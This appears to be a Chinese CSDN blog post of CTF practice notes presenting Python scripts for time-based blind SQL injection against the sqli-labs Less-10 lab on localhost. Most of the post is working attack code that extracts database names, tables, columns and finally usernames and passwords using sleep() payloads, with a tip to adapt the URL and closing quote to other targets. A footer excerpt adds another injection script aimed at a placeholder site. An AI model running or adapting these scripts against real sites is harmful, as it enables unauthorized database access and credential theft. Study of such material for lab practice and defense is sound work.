python脚本实现sql时间盲注

最新推荐文章于 2024-03-31 17:07:02 发布
最新推荐文章于 2024-03-31 17:07:02 发布
阅读量721 收藏 5
点赞数 1
分类专栏: sql注入 ctf练习记录 文章标签: python sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56664029/article/details/129795286
版权

这里用sqli-labs-master第10关举例
在这里插入图片描述
1、爆数据库长度

# coding:utf-8
import requests
import datetime
import time

# 获取数据库名长度
def database_len():
    for i in range(1, 10):
        url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"    #改url
       
        payload = "?id=1\" and if(length(database())>%s,sleep(1),0) --+" % i                 #改闭合
        # print(url+payload+'%23')
        time1 = datetime.datetime.now()
        r = requests.get(url + payload)
        time2 = datetime.datetime.now()
        sec = (time2 - time1).seconds
        if sec >= 1:
            print(i)
        else:
            print(i)
            break
    print('database_len:', i)

if __name__ == '__main__':
    database_len()

在这里插入图片描述
做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的

2、爆数据库名

# coding:utf-8
import requests
import datetime
import time

#获取数据库名
def database_name():
    name = ''
    for j in range(1,9):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"    #改url
            payload = "?id=1\" and if(substr(database(),%d,1)='%s',sleep(3),1) --+" % (j,i)      #改闭合
            #print(url+payload)
            time1 = datetime.datetime.now()
            r = requests.get(url + payload)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >=3:
                name += i
                print(name)
                break
    print('database_name:', name)

if __name__ == '__main__':
    database_name()

在这里插入图片描述
3、爆表名的ascii码

# coding:utf-8
import requests
import datetime
import time
#爆表的ascii码
def table_name():
    name = ''
    for k in range(0,4):
        for j in range(1,10):
            for i in range(33,127):
                url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"      #改url
                payload = "?id=1\" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))='%s',sleep(3),1) --+" % (k,j,i)
                #print(url+payload)                                                #改闭合
                time1 = datetime.datetime.now()
                r = requests.get(url + payload)
                time2 = datetime.datetime.now()
                sec = (time2 - time1).seconds
                if sec >=3:
                    print(i)
                else:
                    i=i+1
                    continue
    print('table_name:', name)


if __name__ == '__main__':
    table_name()

在这里插入图片描述
将表的ascii转化为字符

def  shuchu():
	a=[101,109,97,105,108,115,114,101,102]
	i=0
	while(i<len(a)):
		print(chr(a[i]))
		i=i+1
shuchu()

在这里插入图片描述
4、爆列的ascii码

# coding:utf-8
import requests
import datetime
import time
#爆列的ascii码
def column_name():
    name = ''
    for k in range(0,2):
        for j in range(1,25):
            for i in range(33,127):
                url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"      #改url
                payload = "?id=1\" and if(ascii(substr((select column_name from information_schema.columns where table_name=\"users\" and table_schema=database() limit %d,1),%d,1))='%s',sleep(3),1) --+" % (k,j,i)
                #print(url+payload)                                                #改闭合
                time1 = datetime.datetime.now()
                r = requests.get(url + payload)
                time2 = datetime.datetime.now()
                sec = (time2 - time1).seconds
                if sec >=3:
                    print(i)
                else:
                    i=i+1
                    continue
    print('column_name:', name)


if __name__ == '__main__':
    column_name()

在这里插入图片描述
将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样

5、爆字段ascii码

# coding:utf-8
import requests
import datetime
import time
#爆字段的ascii码
def ziduan():
    name = ''
    for k in range(0,2):
        for j in range(1,50):
            for i in range(33,127):
                url = "http://127.0.0.1:8082/sqli-labs-master/sqli-labs-master/Less-10/index.php"      #改url
                payload = "?id=1\" and if(ascii(substr((select group_concat(id,username,password) from users limit %d,1),%d,1))='%s',sleep(3),1) --+" % (k,j,i)
                #print(url+payload)                                                #改闭合
                time1 = datetime.datetime.now()
                r = requests.get(url + payload)
                time2 = datetime.datetime.now()
                sec = (time2 - time1).seconds
                if sec >=3:
                    print(i)
                else:
                    i=i+1
                    continue
    print('ziduan:', name)


if __name__ == '__main__':
    ziduan()

在这里插入图片描述
将字段ascii码转化为字符

脚本比较简陋,但是自身能力有限,能实现功能即可,有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究

Wrypot
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全SQL注入之时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 2143
这篇文章为大家解析时间盲注实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
使用python编写脚本统计sql执行时间
sinat_38369168的博客
05-22 1176
这两天测试的时候,需要测几十个sql语句的执行时间,一个个的去navicat中执行并统计太麻烦,就把这几十个sql放到excel中,写了个简单的python脚本去统计他的执行时间,并将执行结果保存到以每个sql的id为文件名的csv文件中以便查看 import xlrd import pymysql import time #读excel中的sql file_path=r’E:\x’x’x\rule_run.xlsx’ data=xlrd.open_workbook(file_path) table=dat
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 668
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1600
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
时间盲注脚本(附带注释)
sGanYu
03-22 2777
参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑 # -*- coding: UTF-8 -*- import requests import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} requests.adapters.DEFAULT_RETRIES = 10 conn = requests.session() conn.keep_alive = False # 设置重连
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 508
时间盲注脚本
Python脚本-时间盲注
m0_74317362的博客
09-23 1039
添加了time.sleep(0.05)
SQL时间盲注python脚本
来到了学渣的博客
03-28 4707
环境 Sql-lib靶机 Python3.8 Request、time库 分析 http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22--+ 无触发,用时182毫秒 http://192.168.10.128/sqli-labs-master/Less-6/?id=1%22%20and%20sleep(3)%20--+ 用时3.14秒 ...
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1310
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
时间盲注python脚本.zip
12-28
在本压缩包"时间盲注python脚本.zip"中,包含两个Python脚本文件:time_sql_post.py和time_sql_get.py,分别用于POST和GET方法实现时间盲注自动化攻击。 首先,我们来详细了解一下时间盲注的基本原理。当服务器执行...
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
布尔盲注python脚本.zip
12-28
在给定的压缩包文件"布尔盲注python脚本.zip"中,有两个文件:bool_sql_post.py和bool_sql_get.py,分别对应于使用POST和GET方法进行布尔盲注Python脚本。下面我们将详细讨论这两个知识点。 1. **布尔盲注原理**...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
python脚本时间盲注猜解
qq_36585338的博客
11-26 190
【代码】python脚本时间盲注猜解。
sql注入之时间盲注脚本(python)
npu2022303155的博客
03-31 237
之前看到一个布尔盲注脚本,感觉和时间盲注的逻辑差不多,只是判断条件变化了一下,基本没变化。所以就该了一下脚本。自己第一次做题,脚本跑出来了flag,但是错了中间的一个字符,猜测是时间延迟太小的原因。只是自己用sqlmap找出flag提交后,环境就关闭了,没验证过这个想法。但还是浅浅的记录一下吧。
超硬核,SQL注入之时间盲注,原理+步骤+实战思路
热门推荐
wangyuxiang946的博客
04-15 1万+
延时注入,什么是时间盲注时间盲注原理?时间盲注使用步骤?时间盲注使用场景?时间盲注Python脚本
sqli-labs 第九关 基于时间盲注 python 脚本
Mirror_iu的博客
01-25 3056
# @Author:Mirror import time import requests db_len = 0 def get_schema_len (url): len = 0 left = 0 right = 20 while (left <= right): mid = left + (right - left)//2; data = "id=1' and if(length(database())>{},sleep(0.
SQL注入-时间盲注
acepanhuan的博客
02-11 2634
SQL注入盲注学习
sql注入盲注python脚本
最新发布
04-06
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的操作。而盲注是一种特殊类型的SQL注入攻击,攻击者无法直接获取数据库的具体信息,但可以通过不断尝试不同的条件来判断是否存在漏洞。 下面是一个使用Python编写的简单SQL注入盲注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: return True else: return False def exploit_blind(url): result = "" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" while True: found = False for char in characters: payload = "' OR SUBSTRING((SELECT database()), 1, 1) = '" + char + "' --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: result += char found = True break if not found: break return result # 示例使用方法 url = "http://example.com/vulnerable_page" if check_vulnerable(url): database_name = exploit_blind(url) print("数据库名称:", database_name) else: print("目标网站不易受SQL注入攻击") ``` 上述脚本中,`check_vulnerable`函数用于检测目标网站是否易受SQL注入攻击,它通过在URL中插入特定的payload来判断是否存在漏洞。`exploit_blind`函数用于利用盲注漏洞获取数据库名称,它通过不断尝试不同的字符来逐个获取数据库名称的每个字符。 请注意,上述脚本仅为示例,实际使用时需要根据具体情况进行修改和扩展,同时要遵循法律和道德规范,仅在合法授权的范围内使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值